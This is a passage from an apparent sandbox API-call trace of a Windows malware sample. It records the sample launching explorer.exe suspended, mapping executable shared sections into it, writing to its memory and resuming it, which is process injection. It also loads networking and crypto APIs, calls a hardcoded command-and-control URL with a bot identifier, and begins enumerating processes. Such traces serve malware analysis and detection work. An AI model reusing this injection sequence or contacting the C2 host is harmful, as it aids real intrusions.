ProcessHandle=0xffffffffffffffff, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x7fe00000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x3320000, SectionOffset=0x0, ViewSize=0x746f750*=0x7000) returned 0x0 [0161.940] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x3320023) returned 0x0 [0161.941] NtQueryInformationProcess (in: ProcessHandle=0x644, ProcessInformationClass=0x0, ProcessInformation=0x746f7d8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x746f7d8, ReturnLength=0x0) returned 0x0 [0161.941] ReadProcessMemory (in: hProcess=0x644, lpBaseAddress=0x7fffffd3010, lpBuffer=0x746f7a8, nSize=0x8, lpNumberOfBytesRead=0x746f7a0 | out: lpBuffer=0x746f7a8*, lpNumberOfBytesRead=0x746f7a0*=0x8) returned 1 [0161.941] GetProcessHeap () returned 0x210000 [0161.941] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x198) returned 0x4644680 [0161.941] ReadProcessMemory (in: hProcess=0x644, lpBaseAddress=0xff260000, lpBuffer=0x4644680, nSize=0x190, lpNumberOfBytesRead=0x746f7a0 | out: lpBuffer=0x4644680*, lpNumberOfBytesRead=0x746f7a0*=0x190) returned 1 [0161.941] GetProcessHeap () returned 0x210000 [0161.941] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x4644680) returned 1 [0161.941] WriteProcessMemory (in: hProcess=0x644, lpBaseAddress=0xff28b790, lpBuffer=0x746f7b8*, nSize=0x10, lpNumberOfBytesWritten=0x746f7a0 | out: lpBuffer=0x746f7b8*, lpNumberOfBytesWritten=0x746f7a0*=0x10) returned 1 [0161.942] CloseHandle (hObject=0x5fc) returned 1 [0161.942] CloseHandle (hObject=0x610) returned 1 [0161.942] ResumeThread (hThread=0x634) returned 0x1 [0161.942] GetProcessHeap () returned 0x210000 [0161.942] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x478c310) returned 1 [0161.942] CloseHandle (hObject=0x634) returned 1 [0161.942] CloseHandle (hObject=0x644) returned 1 [0161.942] GetProcessHeap () returned 0x210000 [0161.942] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fde90) returned 1 [0161.942] GetProcessHeap () returned 0x210000 [0161.942] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fc6f0) returned 1 [0161.942] Sleep (dwMilliseconds=0x3e8) [0163.059] GetProcessHeap () returned 0x210000 [0163.059] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fc6f0 [0163.059] GetSystemWow64DirectoryA (in: lpBuffer=0x2fc6f0, uSize=0x104 | out: lpBuffer="C:\\Windows\\SysWOW64") returned 0x13 [0163.059] GetProcessHeap () returned 0x210000 [0163.059] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fde90 [0163.059] GetProcessHeap () returned 0x210000 [0163.059] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x17) returned 0x464c680 [0163.059] wsprintfA (in: param_1=0x2fde90, param_2="%s%s" | out: param_1="C:\\Windows\\SysWOW64\\explorer.exe") returned 32 [0163.059] GetProcessHeap () returned 0x210000 [0163.059] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x464c680) returned 1 [0163.059] CreateProcessInternalA (in: hUserToken=0x0, lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\explorer.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\SysWOW64", lpStartupInfo=0x746f900*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x746f8b8, hNewToken=0x0 | out: lpProcessInformation=0x746f8b8*(hProcess=0x634, hThread=0x644, dwProcessId=0x958, dwThreadId=0x94c), hNewToken=0x0) returned 1 [0163.064] GetProcessHeap () returned 0x210000 [0163.064] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x236c) returned 0x47933a0 [0163.064] lstrcatA (in: lpString1="", lpString2="604954A450752B96B72CF2C4FA84486C9C354B42" | out: lpString1="604954A450752B96B72CF2C4FA84486C9C354B42") returned="604954A450752B96B72CF2C4FA84486C9C354B42" [0163.064] GetCurrentProcessId () returned 0xbdc [0163.064] lstrcatA (in: lpString1="", lpString2="http://hockeysministries.org/playoff/chmpion4378/hockey.php" | out: lpString1="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned="http://hockeysministries.org/playoff/chmpion4378/hockey.php" [0163.064] lstrcatW (in: lpString1="", lpString2="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" | out: lpString1="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)") returned="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" [0163.064] VirtualQuery (in: lpAddress=0x47933a0, lpBuffer=0x746f730, dwLength=0x30 | out: lpBuffer=0x746f730*(BaseAddress=0x4793000, AllocationBase=0x45e0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0163.064] NtCreateSection (in: SectionHandle=0x746f7d0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x746f748, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x746f7d0*=0x5fc) returned 0x0 [0163.064] NtMapViewOfSection (in: SectionHandle=0x5fc, ProcessHandle=0x634, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x70000, SectionOffset=0x0, ViewSize=0x746f750*=0x9000) returned 0x0 [0163.071] NtCreateSection (in: SectionHandle=0x746f7c8, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x746f748, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x746f7c8*=0x610) returned 0x0 [0163.072] NtMapViewOfSection (in: SectionHandle=0x610, ProcessHandle=0x634, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x80000, SectionOffset=0x0, ViewSize=0x746f750*=0x5000) returned 0x0 [0163.072] NtMapViewOfSection (in: SectionHandle=0x5fc, ProcessHandle=0xffffffffffffffff, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x3320000, SectionOffset=0x0, ViewSize=0x746f750*=0x9000) returned 0x0 [0163.073] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x3320000) returned 0x0 [0163.073] NtMapViewOfSection (in: SectionHandle=0x610, ProcessHandle=0xffffffffffffffff, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x3320000, SectionOffset=0x0, ViewSize=0x746f750*=0x5000) returned 0x0 [0163.074] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x33202cd) returned 0x0 [0163.075] NtQueryInformationProcess (in: ProcessHandle=0x634, ProcessInformationClass=0x1a, ProcessInformation=0x746f7b8, ProcessInformationLength=0x8, ReturnLength=0x0 | out: ProcessInformation=0x746f7b8, ReturnLength=0x0) returned 0x0 [0163.075] ReadProcessMemory (in: hProcess=0x634, lpBaseAddress=0x7efde008, lpBuffer=0x746f7a8, nSize=0x4, lpNumberOfBytesRead=0x746f7a0 | out: lpBuffer=0x746f7a8*, lpNumberOfBytesRead=0x746f7a0*=0x4) returned 1 [0163.076] GetProcessHeap () returned 0x210000 [0163.076] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x198) returned 0x4644680 [0163.076] ReadProcessMemory (in: hProcess=0x634, lpBaseAddress=0x550000, lpBuffer=0x4644680, nSize=0x190, lpNumberOfBytesRead=0x746f7a0 | out: lpBuffer=0x4644680*, lpNumberOfBytesRead=0x746f7a0*=0x190) returned 1 [0163.076] GetProcessHeap () returned 0x210000 [0163.076] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x4644680) returned 1 [0163.076] WriteProcessMemory (in: hProcess=0x634, lpBaseAddress=0x580efa, lpBuffer=0x746f7b0*, nSize=0x7, lpNumberOfBytesWritten=0x746f7a0 | out: lpBuffer=0x746f7b0*, lpNumberOfBytesWritten=0x746f7a0*=0x7) returned 1 [0163.076] CloseHandle (hObject=0x610) returned 1 [0163.076] CloseHandle (hObject=0x5fc) returned 1 [0163.077] ResumeThread (hThread=0x644) returned 0x1 [0163.077] GetProcessHeap () returned 0x210000 [0163.077] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x47933a0) returned 1 [0163.077] CloseHandle (hObject=0x644) returned 1 [0163.077] CloseHandle (hObject=0x634) returned 1 [0163.077] GetProcessHeap () returned 0x210000 [0163.077] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fde90) returned 1 [0163.077] GetProcessHeap () returned 0x210000 [0163.077] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fc6f0) returned 1 [0163.077] Sleep (dwMilliseconds=0x3e8) [0164.464] GetProcessHeap () returned 0x210000 [0164.464] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fc6f0 [0164.464] GetWindowsDirectoryA (in: lpBuffer=0x2fc6f0, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0164.465] GetProcessHeap () returned 0x210000 [0164.465] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fde90 [0164.465] GetProcessHeap () returned 0x210000 [0164.465] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x17) returned 0x4741270 [0164.465] wsprintfA (in: param_1=0x2fde90, param_2="%s%s" | out: param_1="C:\\Windows\\explorer.exe") returned 23 [0164.465] GetProcessHeap () returned 0x210000 [0164.465] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x4741270) returned 1 [0164.465] CreateProcessInternalA (in: hUserToken=0x0, lpApplicationName=0x0, lpCommandLine="C:\\Windows\\explorer.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows", lpStartupInfo=0x746f900*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x746f8b8, hNewToken=0x0 | out: lpProcessInformation=0x746f8b8*(hProcess=0x634, hThread=0x8b8, dwProcessId=0x954, dwThreadId=0x948), hNewToken=0x0) returned 1 [0164.468] GetProcessHeap () returned 0x210000 [0164.468] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x2d6c) returned 0x47933a0 [0164.468] lstrcatA (in: lpString1="", lpString2="604954A450752B96B72CF2C4FA84486C9C354B42" | out: lpString1="604954A450752B96B72CF2C4FA84486C9C354B42") returned="604954A450752B96B72CF2C4FA84486C9C354B42" [0164.468] GetCurrentProcessId () returned 0xbdc [0164.468] lstrcatA (in: lpString1="", lpString2="http://hockeysministries.org/playoff/chmpion4378/hockey.php" | out: lpString1="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned="http://hockeysministries.org/playoff/chmpion4378/hockey.php" [0164.468] lstrcatW (in: lpString1="", lpString2="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" | out: lpString1="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)") returned="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" [0164.468] VirtualQuery (in: lpAddress=0x47933a0, lpBuffer=0x746f730, dwLength=0x30 | out: lpBuffer=0x746f730*(BaseAddress=0x4793000, AllocationBase=0x45e0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0164.468] NtCreateSection (in: SectionHandle=0x746f7d0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x746f748, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x746f7d0*=0x5fc) returned 0x0 [0164.468] NtMapViewOfSection (in: SectionHandle=0x5fc, ProcessHandle=0x634, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x50000, SectionOffset=0x0, ViewSize=0x746f750*=0xb000) returned 0x0 [0164.472] NtCreateSection (in: SectionHandle=0x746f7c8, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x746f748, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x746f7c8*=0x644) returned 0x0 [0164.472] NtMapViewOfSection (in: SectionHandle=0x644, ProcessHandle=0x634, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x60000, SectionOffset=0x0, ViewSize=0x746f750*=0x6000) returned 0x0 [0164.472] NtMapViewOfSection (in: SectionHandle=0x5fc, ProcessHandle=0xffffffffffffffff, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x3320000, SectionOffset=0x0, ViewSize=0x746f750*=0xb000) returned 0x0 [0164.474] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7fefdbf0000 [0164.475] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptHashData") returned 0x7fefdbfdac0 [0164.475] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x7fefd080000 [0164.476] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptStringToBinaryA") returned 0x7fefd0ce59c [0164.476] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x7fefc5b0000 [0164.477] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsFree") returned 0x7fefc5b1e74 [0164.477] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e30000 [0164.478] GetProcAddress (hModule=0x76e30000, lpProcName="LoadLibraryA") returned 0x76e47070 [0164.479] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcAddress") returned 0x76e53690 [0164.479] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualProtect") returned 0x76e32ef0 [0164.479] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f50000 [0164.481] GetProcAddress (hModule=0x76f50000, lpProcName="NtCreateSection") returned 0x76fa17b0 [0164.481] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76d30000 [0164.482] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfW") returned 0x76d5099c [0164.482] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x7fef7150000 [0164.483] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpen") returned 0x7fef7153428 [0164.483] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x7fefe260000 [0164.484] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xf) returned 0x7fefe261250 [0164.484] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x3320000) returned 0x0 [0164.486] NtMapViewOfSection (in: SectionHandle=0x644, ProcessHandle=0xffffffffffffffff, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x7fe00000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x3320000, SectionOffset=0x0, ViewSize=0x746f750*=0x6000) returned 0x0 [0164.487] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x3320023) returned 0x0 [0164.489] NtQueryInformationProcess (in: ProcessHandle=0x634, ProcessInformationClass=0x0, ProcessInformation=0x746f7d8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x746f7d8, ReturnLength=0x0) returned 0x0 [0164.489] ReadProcessMemory (in: hProcess=0x634, lpBaseAddress=0x7fffffdc010, lpBuffer=0x746f7a8, nSize=0x8, lpNumberOfBytesRead=0x746f7a0 | out: lpBuffer=0x746f7a8*, lpNumberOfBytesRead=0x746f7a0*=0x8) returned 1 [0164.489] GetProcessHeap () returned 0x210000 [0164.489] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x198) returned 0x4644680 [0164.489] ReadProcessMemory (in: hProcess=0x634, lpBaseAddress=0xff260000, lpBuffer=0x4644680, nSize=0x190, lpNumberOfBytesRead=0x746f7a0 | out: lpBuffer=0x4644680*, lpNumberOfBytesRead=0x746f7a0*=0x190) returned 1 [0164.489] GetProcessHeap () returned 0x210000 [0164.489] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x4644680) returned 1 [0164.489] WriteProcessMemory (in: hProcess=0x634, lpBaseAddress=0xff28b790, lpBuffer=0x746f7b8*, nSize=0x10, lpNumberOfBytesWritten=0x746f7a0 | out: lpBuffer=0x746f7b8*, lpNumberOfBytesWritten=0x746f7a0*=0x10) returned 1 [0164.490] CloseHandle (hObject=0x644) returned 1 [0164.490] CloseHandle (hObject=0x5fc) returned 1 [0164.490] ResumeThread (hThread=0x8b8) returned 0x1 [0164.490] GetProcessHeap () returned 0x210000 [0164.490] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x47933a0) returned 1 [0164.490] CloseHandle (hObject=0x8b8) returned 1 [0164.490] CloseHandle (hObject=0x634) returned 1 [0164.490] GetProcessHeap () returned 0x210000 [0164.490] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fde90) returned 1 [0164.490] GetProcessHeap () returned 0x210000 [0164.490] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fc6f0) returned 1 [0164.490] Sleep (dwMilliseconds=0x3e8) [0165.758] GetProcessHeap () returned 0x210000 [0165.758] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x477bb30) returned 1 [0165.758] GetProcessHeap () returned 0x210000 [0165.758] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x477b7c0) returned 1 [0165.758] GetProcessHeap () returned 0x210000 [0165.758] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x7630080) returned 1 [0165.758] Sleep (dwMilliseconds=0x258) [0166.447] Sleep (dwMilliseconds=0x258) [0167.164] Sleep (dwMilliseconds=0x258) [0167.952] Sleep (dwMilliseconds=0x258) [0168.687] Sleep (dwMilliseconds=0x258) [0169.362] Sleep (dwMilliseconds=0x258) [0170.048] Sleep (dwMilliseconds=0x258) [0170.680] Sleep (dwMilliseconds=0x258) [0171.298] Sleep (dwMilliseconds=0x258) [0171.905] Sleep (dwMilliseconds=0x258) [0172.587] Sleep (dwMilliseconds=0x258) [0173.184] Sleep (dwMilliseconds=0x258) [0173.837] Sleep (dwMilliseconds=0x258) [0174.479] Sleep (dwMilliseconds=0x258) [0175.235] Sleep (dwMilliseconds=0x258) [0175.894] Sleep (dwMilliseconds=0x258) [0176.588] Sleep (dwMilliseconds=0x258) [0177.204] Sleep (dwMilliseconds=0x258) [0177.802] Sleep (dwMilliseconds=0x258) [0178.410] Sleep (dwMilliseconds=0x258) [0179.019] Sleep (dwMilliseconds=0x258) [0179.636] Sleep (dwMilliseconds=0x258) [0180.244] Sleep (dwMilliseconds=0x258) [0180.844] Sleep (dwMilliseconds=0x258) [0181.452] Sleep (dwMilliseconds=0x258) [0182.092] Sleep (dwMilliseconds=0x258) [0182.700] Sleep (dwMilliseconds=0x258) [0183.309] Sleep (dwMilliseconds=0x258) [0183.917] Sleep (dwMilliseconds=0x258) [0184.526] Sleep (dwMilliseconds=0x258) [0185.144] Sleep (dwMilliseconds=0x258) [0185.742] Sleep (dwMilliseconds=0x258) [0186.351] Sleep (dwMilliseconds=0x258) [0186.959] Sleep (dwMilliseconds=0x258) [0187.568] Sleep (dwMilliseconds=0x258) [0188.176] Sleep (dwMilliseconds=0x258) [0188.878] Sleep (dwMilliseconds=0x258) [0189.502] Sleep (dwMilliseconds=0x258) [0190.141] Sleep (dwMilliseconds=0x258) [0190.797] Sleep (dwMilliseconds=0x258) [0191.611] Sleep (dwMilliseconds=0x258) [0192.336] Sleep (dwMilliseconds=0x258) [0193.016] Sleep (dwMilliseconds=0x258) [0193.663] Sleep (dwMilliseconds=0x258) [0194.377] Sleep (dwMilliseconds=0x258) [0195.024] Sleep (dwMilliseconds=0x258) [0195.671] Sleep (dwMilliseconds=0x258) [0196.342] Sleep (dwMilliseconds=0x258) [0196.959] Sleep (dwMilliseconds=0x258) [0197.629] Sleep (dwMilliseconds=0x258) [0198.238] Sleep (dwMilliseconds=0x258) [0198.909] Sleep (dwMilliseconds=0x258) [0199.533] Sleep (dwMilliseconds=0x258) [0200.178] Sleep (dwMilliseconds=0x258) [0200.827] Sleep (dwMilliseconds=0x258) [0201.436] Sleep (dwMilliseconds=0x258) [0202.123] Sleep (dwMilliseconds=0x258) [0202.811] Sleep (dwMilliseconds=0x258) [0203.523] Sleep (dwMilliseconds=0x258) [0204.145] Sleep (dwMilliseconds=0x258) [0204.806] Sleep (dwMilliseconds=0x258) [0205.461] Sleep (dwMilliseconds=0x258) [0206.100] Sleep (dwMilliseconds=0x258) [0206.802] Sleep (dwMilliseconds=0x258) [0207.427] Sleep (dwMilliseconds=0x258) [0208.097] Sleep (dwMilliseconds=0x258) [0208.737] Sleep (dwMilliseconds=0x258) [0209.376] Sleep (dwMilliseconds=0x258) [0209.985] Sleep (dwMilliseconds=0x258) [0210.593] Sleep (dwMilliseconds=0x258) [0211.248] Sleep (dwMilliseconds=0x258) [0211.918] Sleep (dwMilliseconds=0x258) [0212.543] Sleep (dwMilliseconds=0x258) [0213.198] Sleep (dwMilliseconds=0x258) [0213.909] Sleep (dwMilliseconds=0x258) [0214.525] Sleep (dwMilliseconds=0x258) [0215.154] Sleep (dwMilliseconds=0x258) [0215.789] Sleep (dwMilliseconds=0x258) [0216.459] Sleep (dwMilliseconds=0x258) [0217.098] Sleep (dwMilliseconds=0x258) [0217.733] Sleep (dwMilliseconds=0x258) [0218.377] Sleep (dwMilliseconds=0x258) [0218.994] Sleep (dwMilliseconds=0x258) [0219.610] Sleep (dwMilliseconds=0x258) [0220.219] Sleep (dwMilliseconds=0x258) [0220.889] Sleep (dwMilliseconds=0x258) [0221.513] Sleep (dwMilliseconds=0x258) [0222.165] Sleep (dwMilliseconds=0x258) [0222.795] Sleep (dwMilliseconds=0x258) [0223.432] Sleep (dwMilliseconds=0x258) [0224.040] Sleep (dwMilliseconds=0x258) [0224.673] Sleep (dwMilliseconds=0x258) [0225.273] Sleep (dwMilliseconds=0x258) [0225.881] Sleep (dwMilliseconds=0x258) [0226.489] Sleep (dwMilliseconds=0x258) [0227.098] Sleep (dwMilliseconds=0x258) [0227.717] Sleep (dwMilliseconds=0x258) [0228.315] Sleep (dwMilliseconds=0x258) [0228.923] Sleep (dwMilliseconds=0x258) [0229.531] Sleep (dwMilliseconds=0x258) [0230.152] Sleep (dwMilliseconds=0x258) [0230.771] Sleep (dwMilliseconds=0x258) [0231.372] Sleep (dwMilliseconds=0x258) [0231.988] Sleep (dwMilliseconds=0x258) [0232.594] Sleep (dwMilliseconds=0x258) [0233.206] Sleep (dwMilliseconds=0x258) [0233.806] Sleep (dwMilliseconds=0x258) [0234.414] Sleep (dwMilliseconds=0x258) [0235.023] Sleep (dwMilliseconds=0x258) [0235.631] Sleep (dwMilliseconds=0x258) [0236.239] Sleep (dwMilliseconds=0x258) [0236.864] Sleep (dwMilliseconds=0x258) [0237.472] Sleep (dwMilliseconds=0x258) [0238.088] Sleep (dwMilliseconds=0x258) [0238.698] Sleep (dwMilliseconds=0x258) [0239.297] Sleep (dwMilliseconds=0x258) [0239.925] Sleep (dwMilliseconds=0x258) [0240.529] Sleep (dwMilliseconds=0x258) [0241.138] Sleep (dwMilliseconds=0x258) [0241.777] Sleep (dwMilliseconds=0x258) [0242.386] Sleep (dwMilliseconds=0x258) [0243.002] Sleep (dwMilliseconds=0x258) [0243.603] Sleep (dwMilliseconds=0x258) [0244.217] Sleep (dwMilliseconds=0x258) [0244.828] Sleep (dwMilliseconds=0x258) [0245.428] Sleep (dwMilliseconds=0x258) [0246.044] Sleep (dwMilliseconds=0x258) [0246.645] Sleep (dwMilliseconds=0x258) [0247.266] Sleep (dwMilliseconds=0x258) [0247.861] Sleep (dwMilliseconds=0x258) [0248.479] Sleep (dwMilliseconds=0x258) [0249.078] Sleep (dwMilliseconds=0x258) [0249.699] Sleep (dwMilliseconds=0x258) [0250.295] Sleep (dwMilliseconds=0x258) [0250.904] Sleep (dwMilliseconds=0x258) [0251.520] Sleep (dwMilliseconds=0x258) [0252.120] Sleep (dwMilliseconds=0x258) [0252.729] Sleep (dwMilliseconds=0x258) [0253.358] Sleep (dwMilliseconds=0x258) [0253.961] Sleep (dwMilliseconds=0x258) [0254.587] Sleep (dwMilliseconds=0x258) [0255.193] Sleep (dwMilliseconds=0x258) [0255.802] Sleep (dwMilliseconds=0x258) [0256.410] Sleep (dwMilliseconds=0x258) [0257.019] Sleep (dwMilliseconds=0x258) [0257.634] Sleep (dwMilliseconds=0x258) [0258.235] Sleep (dwMilliseconds=0x258) [0258.844] Sleep (dwMilliseconds=0x258) [0259.452] Sleep (dwMilliseconds=0x258) [0260.061] Sleep (dwMilliseconds=0x258) [0260.669] Sleep (dwMilliseconds=0x258) [0261.289] Sleep (dwMilliseconds=0x258) [0261.886] Sleep (dwMilliseconds=0x258) [0262.541] Sleep (dwMilliseconds=0x258) Thread: id = 189 os_tid = 0x8e4 [0141.248] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa6c [0141.252] Process32First (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.253] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0141.253] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 